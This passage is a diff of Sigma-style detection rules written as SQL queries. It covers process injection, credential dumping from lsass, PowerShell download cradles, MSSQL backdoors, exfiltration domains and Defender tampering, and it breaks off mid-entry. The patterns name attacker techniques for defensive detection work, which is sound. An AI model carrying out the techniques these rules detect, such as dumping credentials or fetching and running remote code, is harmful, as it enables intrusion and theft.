"rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (StartAddress LIKE '%0B80' ESCAPE '\\' OR StartAddress LIKE '%0C7C' ESCAPE '\\' OR StartAddress LIKE '%0C88' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" ], - "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml" + "filename": "win_system_apt_carbonpaper_turla.yml" }, { - "title": "CreateRemoteThread API and LoadLibrary", - "id": "052ec6f6-1adc-41e6-907a-f1c813478bee", - "status": "test", - "description": "Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": 
"Invoke-Obfuscation VAR+ Launcher - System", + "id": "8ca7004b-e620-4ecb-870e-86129b5b8e75", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1055.001" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND StartModule LIKE '%\\\\kernel32.dll' ESCAPE '\\' AND StartFunction = 'LoadLibraryA')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%\"set%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "create_remote_thread_win_loadlibrary.yml" + "filename": "win_system_invoke_obfuscation_var_services.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell Remote Thread", - "id": "fb656378-f909-47c1-8747-278bf09f4f4f", + "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "id": "52a85084-6989-40c3-8f32-091e12e17692", "status": "experimental", - "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation. 
Viewed on 2008 Server", + "author": "Cybex", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" ], - "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" }, { - "title": "Remote Thread Creation in Suspicious Targets", - "id": "a1a144b7-5c9b-4853-a559-2172be8d4a03", - "status": "experimental", - "description": "Detects a remote thread creation in suspicious target images", - "author": "Florian Roth (Nextron Systems)", + "title": "Atera Agent Installation", + "id": "87261fb2-69d0-42fe-b9de-88c6b5f65a43", + "status": "test", + "description": "Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.003" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate Atera agent installation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\notepad.exe' ESCAPE '\\' OR 
TargetImage LIKE '%\\\\sethc.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\write.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR TargetImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((StartFunction = 'EtwpNotificationThread') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Message LIKE '%AteraAgent%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_targets.yml" + "filename": "win_software_atera_rmm_agent_install.yml" }, { - "title": "KeePass Password Dumping", - "id": "77564cc2-7382-438b-a7f6-395c2ae53b9a", + "title": "LPE InstallerFileTakeOver PoC CVE-2021-41379", + "id": "7dbb86de-a0cc-494c-8aa8-b2996c9ef3c8", "status": "experimental", - "description": "Detects remote thread creation in KeePass.exe indicating password dumping activity", - "author": "Timon Hackenjos", + "description": "Detects PoC tool used to exploit LPE vulnerability CVE-2021-41379", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555.005" + "attack.initial_access", + "attack.t1190" ], "falsepositives": [ - "Unknown" + "Other MSI packages for which your admins have used that name" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\KeePass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1033' AND Provider_Name = 'MsiInstaller' AND Data LIKE '%test pkg%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_password_dumper_keepass.yml" + "filename": "win_vul_cve_2021_41379.yml" }, { - "title": "Bumblebee Remote Thread Creation", - "id": "994cac2b-92c2-44bf-8853-14f6ca39fbda", + "title": "Microsoft Malware Protection Engine Crash - WER", + "id": 
"6c82cf5c-090d-4d57-9188-533577631108", "status": "experimental", - "description": "Detects remote thread injection events based on action seen used by bumblebee", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\wabmig.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Windows Error Reporting' AND EventID = '1001' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_bumblebee.yml" + "filename": "win_application_msmpeng_crash_wer.yml" }, { - "title": "Password Dumper Remote Thread in LSASS", - "id": "f239b326-2f41-4d6b-9dfa-c846a60ef505", - "status": "stable", - "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", - "author": "Thomas Patzke", + "title": "Audit CVE Event", + "id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", + "status": "experimental", + "description": "Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited.\nMS started using this log in Jan. 
2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability.\nUnfortunately, that is about the only instance of CVEs being written to this log.\n", + "author": "Florian Roth (Nextron Systems), Zach Mathis", "tags": [ + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068", + "attack.defense_evasion", + "attack.t1211", "attack.credential_access", - "attack.s0005", - "attack.t1003.001" + "attack.t1212", + "attack.lateral_movement", + "attack.t1210", + "attack.impact", + "attack.t1499.004" ], "falsepositives": [ - "Antivirus products" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name IN ('Microsoft-Windows-Audit-CVE', 'Audit-CVE') AND EventID = '1')" ], - "filename": "create_remote_thread_win_password_dumper_lsass.yml" + "filename": "win_audit_cve.yml" }, { - "title": "Remote Thread Creation Ttdinject.exe Proxy", - "id": "c15e99a3-c474-48ab-b9a7-84549a7a9d16", + "title": "Microsoft Malware Protection Engine Crash", + "id": "545a5da6-f103-4919-a519-e9aec1026ee4", "status": "experimental", - "description": "Detects a remote thread creation of Ttdinject.exe used as proxy", - "author": "frack113", + "description": "This rule detects a suspicious crash of the Microsoft Malware Protection Engine", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1211", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "MsMpEng might crash if the \"C:\\\" partition is full" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\ttdinject.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application 
Error' AND EventID = '1000' AND Data LIKE '%MsMpEng.exe%' ESCAPE '\\' AND Data LIKE '%mpengine.dll%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_ttdinjec.yml" + "filename": "win_application_msmpeng_crash_error.yml" }, { - "title": "Suspicious Remote Thread Source", - "id": "66d31e5f-52d6-40a4-9615-002d3789a119", + "title": "Potential Credential Dumping Via WER - Application", + "id": "a18e0862-127b-43ca-be12-1a542c75c7c5", "status": "experimental", - "description": "Offensive tradecraft is switching away from using APIs like \"CreateRemoteThread\", however, this is still largely observed in the wild.\nThis rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.\nIt is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.\n", - "author": "Perez Diego (@darkquassar), oscd.community", + "description": "Detects windows error reporting event where the process that crashed is lsass. 
This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1055" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate crashing of the lsass process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\bash.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cvtres.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\defrag.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dnx.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\expand.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\find.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\findstr.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\hh.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\installutil.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\lync.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\makecab.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mDNSResponder.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\outlook.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ping.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\provtool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\python.exe' ESCAPE '\\' OR 
SourceImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\runonce.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\sapcimc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\tstheme.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\userinit.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winscp.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND NOT ((SourceImage LIKE '%Visual Studio%' ESCAPE '\\' OR SourceParentImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\' AND TargetParentImage = 'System' AND TargetParentProcessId = '4') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\provtool.exe' ESCAPE '\\' AND TargetParentProcessId = '0') OR (SourceImage LIKE '%\\\\git.exe' ESCAPE '\\' AND (TargetImage LIKE '%\\\\git.exe' ESCAPE '\\' OR TargetImage LIKE '%C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\VSSVC.exe' ESCAPE '\\' AND TargetImage = 'System') OR (SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\schtasks.exe' 
ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\NVIDIA Corporation\\\\NVIDIA GeForce Experience\\\\NVIDIA GeForce Experience.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Application Error' AND EventID = '1000' AND AppName = 'lsass.exe' AND ExceptionCode = 'c0000001')" ], - "filename": "create_remote_thread_win_susp_remote_thread_source.yml" + "filename": "win_werfault_susp_lsass_credential_dump.yml" }, { - "title": "Accessing WinAPI in PowerShell. Code Injection", - "id": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", - "status": "test", - "description": "Detects the creation of a remote thread from a Powershell process to another process", - "author": "Nikita Nazarov, oscd.community", + "title": "Restricted Software Access By SRP", + "id": "b4c8da4a-1c12-46b0-8a2b-0a8521d03442", + "status": "experimental", + "description": "Detects restricted access to applications by the Software Restriction Policies (SRP) policy", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT ((SourceParentImage LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'Microsoft-Windows-SoftwareRestrictionPolicies' AND EventID IN ('865', '866', '867', '868', '882'))" ], - "filename": "create_remote_thread_win_powershell_code_injection.yml" + "filename": "win_software_restriction_policies_block.yml" 
}, { - "title": "CACTUSTORCH Remote Thread Creation", - "id": "2e4e488a-6164-4811-9ea1-f960c7359c40", - "status": "test", - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", - "author": "@SBousseaden (detection), Thomas Patzke (rule)", + "title": "MSSQL XPCmdshell Option Change", + "id": "d08dd86f-681e-4a00-a92c-1db218754417", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate enable/disable of the setting", + "Note that since the event contain the change for both values. This means that this will trigger on both enable and disable" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\System32\\\\cscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\wscript.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\System32\\\\mshta.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\excel.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' AND StartModule = '')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_cactustorch.yml" + "filename": "win_mssql_xp_cmdshell_change.yml" }, { - "title": "PowerShell Rundll32 Remote Thread Creation", - "id": "99b97608-3e21-4bfe-8217-2a127c396a0e", + "title": "MSSQL Add Account To Sysadmin Role", + "id": "08200f85-2678-463e-9c32-88dce2f073d1", "status": "experimental", - "description": "Detects PowerShell remote thread creation in Rundll32.exe", - 
"author": "Florian Roth (Nextron Systems)", + "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Rare legitimate administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '8' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\rundll32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" ], - "filename": "create_remote_thread_win_susp_powershell_rundll32.yml" + "filename": "win_mssql_add_sysadmin_account.yml" }, { - "title": "Suspicious Scripting in a WMI Consumer", - "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", + "title": "MSSQL Extended Stored Procedure Backdoor Maggie", + "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", "status": "experimental", - "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", + "author": "Denis Szadkowski, DIRT / DCSO CyTec", "tags": [ - "attack.execution", - "attack.t1059.005" + "attack.persistence", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative scripts" + "Legitimate extended stored procedures named maggie" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID 
IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" ], - "filename": "sysmon_wmi_susp_scripting.yml" + "filename": "win_mssql_sp_maggie.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - Sysmon", - "id": "065cceea-77ec-4030-9052-fc0affea7110", + "title": "MSSQL SPProcoption Set", + "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", "status": "experimental", - "description": "Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes", - "author": "pH-T (Nextron Systems)", + "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. 
A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Legitimate use of the feature by administrators (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_anonymfiles_com.yml" + "filename": "win_mssql_sp_procoption_set.yml" }, { - "title": "DNS HybridConnectionManager Service Bus", - "id": "7bd3902d-8b8b-4dd4-838a-c6862d40150d", - "status": "test", - "description": "Detects Azure Hybrid Connection Manager services querying the Azure service bus service", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "MSSQL XPCmdshell Suspicious Execution", + "id": "7f103213-a04e-4d59-8261-213dddf22314", + "status": "experimental", + "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution" ], "falsepositives": [ - "Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%servicebus.windows.net%' ESCAPE '\\' AND Image LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND 
EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" ], - "filename": "dns_query_win_hybridconnectionmgr_servicebus.yml" + "filename": "win_mssql_xp_cmdshell_audit_log.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", - "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", - "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Florian Roth (Nextron Systems)", + "title": "MSSQL Disable Audit Settings", + "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "status": "experimental", + "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" ], - "filename": "dns_query_win_mal_cobaltstrike.yml" + "filename": "win_mssql_disable_audit_settings.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - Sysmon", - "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", + "title": "MSMQ Corrupted Packet Encountered", + "id": "ae94b10d-fee9-4767-82bb-439b309d5a27", "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "yatinwad and TheDFIRReport", + "description": "Detects corrupted packets sent to the MSMQ service. 
Could potentially be a sign of CVE-2023-21554 exploitation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.execution" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSMQ' AND EventID = '2027' AND Level = '2')" ], - "filename": "dns_query_win_ufile_io.yml" + "filename": "win_msmq_corrupted_packet.yml" }, { - "title": "Regsvr32 Network Activity - DNS", - "id": "36e037c4-c228-4866-b6a3-48eb292b9955", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Windows Defender Threat Detection Disabled", + "id": "fe34868f-6e0e-4882-81f6-c43aa8f15b62", + "status": "stable", + "description": "Detects disabling Windows Defender threat protection", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions (should be investigated)", + "Seen being triggered occasionally during Windows 8 Defender Updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('5001', '5010', '5012', '5101'))" ], - "filename": "dns_query_win_regsvr32_network_activity.yml" + "filename": "win_defender_disabled.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - DNS", - "id": "bd03a0dc-5d93-49eb-b2e8-2dfd268600f8", - "status": 
